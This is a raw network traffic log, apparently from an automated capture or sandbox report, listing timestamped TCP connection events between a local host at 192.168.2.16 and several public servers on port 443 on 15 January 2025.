                                                                                                                                            Jan 15, 2025 19:14:35.315037966 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.315051079 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.327275038 CET44349775104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.327373028 CET44349775104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.327640057 CET49775443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.328283072 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.328285933 CET49775443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.328309059 CET44349775104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.328331947 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.328517914 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.329421043 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.329442024 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.341041088 CET44349776104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.341284037 CET44349776104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.341465950 CET49776443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.341763973 CET49776443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.341804028 CET44349776104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.342016935 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.342047930 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.343337059 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.343352079 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.343691111 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.344594002 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.344607115 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393171072 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393205881 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393270969 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393289089 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.393297911 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393338919 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.393790007 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.393836975 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.394347906 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.394347906 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.394936085 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.394983053 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.395179033 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.395487070 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.395517111 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.404437065 CET44349778104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.404489040 CET44349778104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.404592037 CET44349778104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.404658079 CET49778443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.405376911 CET49778443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.405395985 CET44349778104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.405769110 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.405837059 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.406595945 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.406776905 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.406811953 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469221115 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469348907 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469432116 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469458103 CET49779443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.469477892 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469640017 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.469743013 CET49779443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.470506907 CET49779443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.470508099 CET49779443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.470860958 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.470906973 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.473893881 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.474102020 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.474134922 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478395939 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478439093 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478466988 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478491068 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478513956 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478739977 CET49780443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.478776932 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.478842020 CET49780443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.478979111 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.479057074 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.479130983 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.479161978 CET49780443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.479224920 CET49780443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.479475975 CET49780443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.479495049 CET44349780104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.479531050 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.479590893 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.479657888 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.481412888 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.481437922 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.582128048 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.582600117 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.582627058 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.584072113 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.584177017 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.584506035 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.584582090 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.584669113 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.584676027 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.589417934 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.589710951 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.589736938 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.590204954 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.591173887 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.591173887 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.591269016 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.604921103 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.605199099 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.605232000 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.605739117 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.606157064 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.606157064 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.606185913 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.606257915 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.625329971 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.641470909 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.657315969 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.702225924 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.702491999 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.702503920 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.703522921 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.704456091 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.704457045 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.704519987 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.704611063 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.706315994 CET49777443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.706338882 CET44349777104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.739245892 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.741492987 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.741563082 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.742764950 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.743314028 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.743557930 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.743608952 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.751336098 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.753423929 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.753432035 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.762581110 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.762720108 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.763418913 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.763859034 CET49782443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.763875961 CET44349782104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.763875961 CET49798443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.763977051 CET44349798104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.764378071 CET49798443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.766217947 CET49798443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.766252041 CET44349798104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.768147945 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.768408060 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.769252062 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.769361973 CET49781443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.769407988 CET44349781104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.769541025 CET49799443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.769634962 CET44349799104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.770638943 CET49799443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.771033049 CET49799443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.771069050 CET44349799104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.774720907 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.775012016 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.775031090 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.775546074 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.775944948 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.775944948 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.776036978 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.784300089 CET49779443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.784332037 CET44349779104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.784332991 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.784374952 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.785528898 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.785747051 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.785780907 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.786190033 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.786421061 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.786433935 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.787302971 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.787364006 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.787606001 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.787826061 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.787911892 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.788117886 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.788305998 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.788419008 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.788429976 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.788506985 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.798224926 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.798469067 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.798636913 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.798691988 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.798932076 CET49783443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.798952103 CET44349783104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.799273014 CET49800443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.799354076 CET44349800104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.799433947 CET49800443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.799778938 CET49800443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.799810886 CET44349800104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.800299883 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.816379070 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.817637920 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.817854881 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.817864895 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.821594000 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.821732998 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.821959019 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.822092056 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.822098017 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.822141886 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.833312988 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.835376978 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.864397049 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.864407063 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.875174999 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.875422955 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.875600100 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.876312971 CET49787443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.876353979 CET44349787104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.877002954 CET49801443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.877094984 CET44349801104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.877171040 CET49801443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.877466917 CET49801443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.877502918 CET44349801104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.878858089 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.879126072 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.879154921 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.879540920 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.879960060 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.880038977 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.881728888 CET49792443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.883244038 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.883459091 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.883491993 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.884550095 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.884629965 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.885024071 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.885097980 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.885236025 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.901716948 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.901871920 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.901921034 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.902472973 CET49784443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.902487040 CET44349784104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.912369013 CET49791443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.913813114 CET49802443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.913882971 CET44349802104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.914031982 CET49802443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.914243937 CET49802443192.168.2.16104.244.42.136
                                                                                                                                            Jan 15, 2025 19:14:35.914274931 CET44349802104.244.42.136192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.927325964 CET44349792104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.927339077 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.928318977 CET49793443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.928339958 CET44349793104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.929919958 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.929999113 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.930071115 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.930119991 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.930663109 CET49790443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.930681944 CET44349790104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.931026936 CET49803443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.931068897 CET44349803104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.931489944 CET49803443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.931911945 CET49803443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.931941986 CET44349803104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.935890913 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936003923 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936078072 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.936099052 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936125040 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936230898 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.936243057 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936307907 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.936355114 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.936805964 CET49789443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.936819077 CET44349789104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.937128067 CET49804443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.937176943 CET44349804104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.937376976 CET49804443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.937644958 CET49804443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:35.937669992 CET44349804104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.943779945 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.943995953 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.944019079 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.945063114 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.945146084 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.945430040 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.945498943 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.945596933 CET49796443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.945610046 CET44349796104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948405027 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948573112 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948631048 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.948652029 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948771000 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948900938 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.948915005 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.948973894 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.949114084 CET49788443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.949137926 CET44349788104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.949430943 CET49805443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.949470997 CET44349805104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.949542999 CET49805443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.949805975 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.949867964 CET49805443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.949898958 CET44349805104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.950161934 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.950184107 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.953875065 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.953959942 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.954237938 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.954345942 CET49794443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:35.954356909 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.954416990 CET44349794104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.972163916 CET44349791104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.972296953 CET44349791104.18.69.40192.168.2.16
